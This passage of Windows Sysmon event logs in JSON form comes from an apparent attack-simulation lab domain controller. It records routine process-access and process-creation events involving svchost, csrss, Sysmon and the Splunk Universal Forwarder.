CRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4269,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4270,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4271,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20B3-5F25-0000-00108C510600}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20B3-5F25-0000-00108C510600}","TargetProcessId":"3892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4272,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.485\r\nSourceProcessGUID: {41C8662E-20B3-5F25-0000-00108C510600}\r\nSourceProcessId: 3892\r\nSourceThreadId: 3900\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.485","SourceProcessGUID":"{41C8662E-20B3-5F25-0000-00108C510600}","SourceProcessId":"3892","SourceThreadId":"3900","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4273,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.017\r\nProcessGuid: {41C8662E-20B4-5F25-0000-001030530600}\r\nProcessId: 816\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.017","ProcessGuid":"{41C8662E-20B4-5F25-0000-001030530600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4274,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.016\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20B4-5F25-0000-001030530600}\r\nTargetProcessId: 816\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.016","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20B4-5F25-0000-001030530600}","TargetProcessId":"816","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4275,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.016\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20B4-5F25-0000-001030530600}\r\nTargetProcessId: 816\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.016","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20B4-5F25-0000-001030530600}","TargetProcessId":"816","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4276,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.016\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.016","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4277,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.016\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.016","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTE